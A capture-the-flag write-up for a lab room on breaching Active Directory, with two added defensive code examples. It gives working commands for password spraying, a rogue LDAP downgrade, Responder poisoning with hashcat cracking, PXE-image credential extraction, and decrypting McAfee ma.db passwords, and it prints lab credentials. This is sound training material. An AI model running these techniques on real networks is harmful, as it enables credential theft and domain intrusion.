
Breaching Active Directory

This guide contains the answers for the Breaching Active Directory room and the steps needed to reach them.

Table of contents

OSINT and Phishing

  1. I understand OSINT and how it can be used to breach AD

  2. I understand Phishing and how it can be used to breach AD

  3. What popular website can be used to verify if your email address or password has ever been exposed in a publicly disclosed data breach?

This answer can be found in the text or by searching online.

Answer: HaveIBeenPwned

NTLM Authenticated Services

  1. What is the name of the challenge-response authentication mechanism that uses NTLM?

This can be found in the text.

Answer: NetNtlm

  2. What is the username of the third valid credential pair found by the password spraying script?

We first download the Python script and place it on our machine. In it we can see that there are four arguments we need to supply (-u, -f, -p, -a).

NTLM Script.png

Using Changeme123 as the password, we use the following command to start the spray attack:

python3 ntlm_passwordspray.py -u usernames.txt -f za.tryhackme.com -p Changeme123 -a http://ntlmauth.za.tryhackme.com/

NTLM Credentials.png

We found four sets of credentials using this attack!

Answer: gordon.stevens

  3. How many valid credential pairs were found by the password spraying script?

This follows from the spray results in the previous question.

Answer: 4
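From the defender's side, the spray above leaves a distinctive trace: one source failing against many different usernames in a short time, which per-account lockout thresholds never catch. The following detector is an added example, not part of the room or the write-up; the log format and the sample lines are constructed and assumed.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log lines (not from the room). Assumed format:
#   "<ISO timestamp> <source ip> <username> <AUTH_OK|AUTH_FAIL>"
# 10.50.1.7 tries one password against 20 accounts in 20 seconds and gets one hit;
# 10.50.2.9 is an ordinary user mistyping their own password twice.
SAMPLE_LOG = [
    f"2022-03-21T14:00:{i:02d} 10.50.1.7 user{i:02d} AUTH_FAIL" for i in range(20)
] + [
    "2022-03-21T14:00:20 10.50.1.7 user20 AUTH_OK",
    "2022-03-21T14:05:00 10.50.2.9 user03 AUTH_FAIL",
    "2022-03-21T14:05:10 10.50.2.9 user03 AUTH_FAIL",
    "2022-03-21T14:05:30 10.50.2.9 user03 AUTH_OK",
]

def parse_line(line):
    ts, src, user, result = line.split()
    return datetime.fromisoformat(ts), src, user, result

def detect_spray(lines, window=timedelta(minutes=5), min_users=10):
    """Return {source_ip: (number of distinct users that failed, users that
    succeeded in the same window)} for every source whose failures span at
    least min_users accounts inside one sliding window. Spraying stays under
    the per-account lockout threshold, so the count is per source, not per user."""
    by_src = defaultdict(list)
    for ts, src, user, result in sorted(parse_line(l) for l in lines):
        by_src[src].append((ts, user, result))
    alerts = {}
    for src, evs in by_src.items():
        start = 0
        for end in range(len(evs)):
            while evs[end][0] - evs[start][0] > window:   # slide the window start
                start += 1
            win = evs[start:end + 1]
            failed = {u for _, u, r in win if r == "AUTH_FAIL"}
            if len(failed) >= min_users:
                hits = sorted(u for _, u, r in win if r == "AUTH_OK")
                alerts[src] = (len(failed), hits)
    return alerts

if __name__ == "__main__":
    for src, (n, hits) in detect_spray(SAMPLE_LOG).items():
        print(f"{src}: {n} accounts failed, successful logins: {hits}")
```

The successful logins reported next to a spraying source are the credential pairs that need resetting first.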

  4. What is the message displayed by the web application when authenticating with a valid credential pair?

On http://ntlmauth.za.tryhackme.com/ we get a login screen where we can use our previously found credentials.

NTLM Login.png

Logging in on Firefox didn't work, so I had to switch to Chrome.

NTLM Welcome.png

Answer: Hello World

LDAP Bind Credentials

  1. What type of attack can be performed against LDAP Authentication systems not commonly found against Windows Authentication systems?

The answer can be found in the text.

Answer: LDAP Pass-back Attack

  2. What two authentication mechanisms do we allow on our rogue LDAP server to downgrade the authentication and make it clear text?

The answer can be found in the text.

Answer: LOGIN,PLAIN

  3. What is the password associated with the svcLDAP account?

Since I didn't have OpenLDAP installed on my machine, I had to install it manually with:

sudo apt-get -y install slapd ldap-utils && sudo systemctl enable slapd

sudo dpkg-reconfigure -p low slapd

On the config screen we start the server config process.

LDAP Config 1.png

We use za.tryhackme.com as the domain and the company name.

LDAP Config 2.png

Next, we create a file called `olcSaslSecProps.ldif` with the following contents:

#olcSaslSecProps.ldif
dn: cn=config
replace: olcSaslSecProps
olcSaslSecProps: noanonymous,minssf=0,passcred

We then update the LDAP server with:

sudo ldapmodify -Y EXTERNAL -H ldapi:// -f ./olcSaslSecProps.ldif && sudo service slapd restart

LDAP Config 3.png

Using `` we can check whether the configuration change was applied successfully.

LDAP Config 4.png

After testing the connection again on the printer page, we get an error message, which in this case tells us that the setup worked.

LDAP Syntax.png

Now we can monitor the network traffic to intercept the password.

In Wireshark we capture on the breachad interface. We can reduce the noise by filtering for LDAP traffic coming from the printer only:

ip.src == 10.200.24.201 and ldap

After a few tries, we get the credentials in one of the calls in cleartext.

LDAP Credentials.png

Answer: tryhackmeldappass1@
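The credential shows up in Wireshark because, after the downgrade, the printer sends it inside an LDAP BindRequest with no encryption. The following is an added example, not code from the room or the write-up: a minimal BER encoder/decoder for that BindRequest, so a defender can check captured LDAP packets for cleartext credentials (simple bind or SASL PLAIN). The sample account name and password are constructed.

```python
def ber(tag, body):
    """One BER TLV with a definite length (short or long form)."""
    n = len(body)
    if n < 0x80:
        return bytes([tag, n]) + body
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + body

def read_tlv(buf, pos):
    """Return (tag, value, position after the TLV) for the TLV at pos."""
    tag, n, pos = buf[pos], buf[pos + 1], pos + 2
    if n & 0x80:
        k = n & 0x7F
        n, pos = int.from_bytes(buf[pos:pos + k], "big"), pos + k
    return tag, buf[pos:pos + n], pos + n

def build_bind(msg_id, name, password=None, sasl_plain=None):
    """LDAPMessage{messageID, BindRequest{version 3, name, simple [0] or sasl [3] PLAIN}}."""
    if sasl_plain is not None:
        auth = ber(0xA3, ber(0x04, b"PLAIN") + ber(0x04, sasl_plain))
    else:
        auth = ber(0x80, password.encode())
    bind = ber(0x60, ber(0x02, b"\x03") + ber(0x04, name.encode()) + auth)
    return ber(0x30, ber(0x02, bytes([msg_id])) + bind)

def cleartext_bind(packet):
    """Return (name, password) if this LDAPMessage is a BindRequest carrying a
    cleartext credential (simple bind or SASL PLAIN), otherwise None."""
    tag, msg, _ = read_tlv(packet, 0)
    if tag != 0x30:
        return None
    _, _, pos = read_tlv(msg, 0)                # messageID
    tag, bind, _ = read_tlv(msg, pos)
    if tag != 0x60:                              # not a BindRequest
        return None
    _, _, pos = read_tlv(bind, 0)               # version
    _, name, pos = read_tlv(bind, pos)
    tag, auth, _ = read_tlv(bind, pos)
    if tag == 0x80:                              # simple authentication
        return name.decode(), auth.decode()
    if tag == 0xA3:                              # SASL
        _, mech, pos = read_tlv(auth, 0)
        _, creds, _ = read_tlv(auth, pos)
        if mech == b"PLAIN":                     # authzid \0 authcid \0 password
            return name.decode(), creds.split(b"\x00")[-1].decode()
    return None

# Constructed sample: a simple bind like the one the printer sends to the rogue server.
SAMPLE = build_bind(1, "svcExample@example.local", password="ExamplePass1")
```

Seeing such a bind on the wire means the client should be moved to LDAPS or StartTLS with a minimum SSF that forbids cleartext mechanisms.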

Authentication Relays

  1. What is the name of the tool we can use to poison and capture authentication requests on the network?

The answer can be found in the text.

Answer: Responder

  2. What is the username associated with the challenge that was captured?

First, we set up Responder to listen for authentication requests:

sudo responder -I breachad

Auth Responder.png

After a while, we see it has intercepted a request. This request contains the username and the password hash of the user.

Auth Event.png

With this hash and the provided password list, we can attempt to crack the hash using hashcat. Hash type 5600 is for NTLMv2-SSP.

hashcat -a 0 -m 5600 ntlmhash passwordlist-1647876320267.txt --force

Auth Cracked.png

Answer: svcFileCopy

  3. What is the value of the cracked password associated with the challenge that was captured?

Answer: FPassword1!

Microsoft Deployment Toolkit

  1. What Microsoft tool is used to create and host PXE Boot images in organisations?

The answer can be found in the text.

Answer: (not recorded)

  2. What network protocol is used for recovery of files from the MDT server?

The answer can be found in the text.

Answer: (not recorded)

  3. What is the username associated with the account that was stored in the PXE Boot image?

I couldn't get the SSH connection to work on my Kali instance, so I tried through the AttackBox. After connecting, I created a new folder and copied the PowerPXE files into it (the copy command lists each file it copies, e.g. C:\powerpxe\LICENSE).

cd Documents
mkdir Kevinovitz
copy C:\powerpxe Kevinovitz\
cd Kevinovitz

Mdt Ssh.png

I then looked up the IP for the MDT server with nslookup:

nslookup thmmdt.za.tryhackme.com

Mdt Ip.png

Now we can transfer the bcd file using tftp, using the file name we found on the MDT server.

Mdt Files.png

tftp -i 10.200.24.202 GET "\tmp\x64uefi{D2CDF2F6-30D2-430D-84C0-32C200D1D39A}.bcd" conf.bcd

Mdt Tftp.png

Here we get the path to the PXE boot image. We can download it with tftp using this path.

tftp -i 10.200.24.202 GET "\Boot\x64\Images\LiteTouchPE_x64.wim" pxeboot.wim

Mdt Pxe.png

Now we can extract the credentials from the image with PowerPXE. In PowerShell, we load the module first and then run its search function:

Import-Module .\PowerPXE.ps1
Get-FindCredentials -WimFile pxeboot.wim

Mdt Credentials.png

Answer: svcMDT

  4. What is the password associated with the account that was stored in the PXE Boot image?

This password was found in the previous task using PowerPXE.

Answer: PXEBootSecure1@

  5. While you should make sure to clean up the user directory that you created at the start of the task, if you try you will notice that you get an access denied error. Don't worry, a script will help with the cleanup process, but remember to always perform cleanup when you are doing assessments.

Configuration Files

  1. What type of files often contain stored credentials on hosts?

The answer can be found in the text.

Answer: Configuration Files

  2. What is the name of the McAfee database that stores configuration including credentials used to connect to the orchestrator?

The answer can be found in the text.

Answer: ma.db

  3. What table in this database stores the credentials of the orchestrator?

The answer can be found in the text.

Answer: AGENT_REPOSITORIES

  4. What is the username of the AD account associated with the McAfee service?

First we look up where the ma.db file is located. It lives in C:\ProgramData\McAfee\Agent\DB, so we change into that directory with cd C:\ProgramData\McAfee\Agent\DB.

Configuration File.png

We then transfer this file to our machine.

scp thm@thmjmp1.za.tryhackme.com:C:/ProgramData/McAfee/Agent/DB/ma.db .

Configuration Transfer.png

We open the database in sqlitebrowser to browse to the table containing the credentials:

sqlitebrowser ma.db

Here we navigate to the AGENT_REPOSITORIES table and find the credentials we are looking for.

Configuration Credentials.png

Answer: svcAV

  5. What is the password of the AD account associated with the McAfee service?

Using the decryption script, we can decrypt the password we got from the database.

python2 mcafee_sitelist_pwd_decrypt.py jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q==

Configuration Password.png

Answer: MyStrongPassword!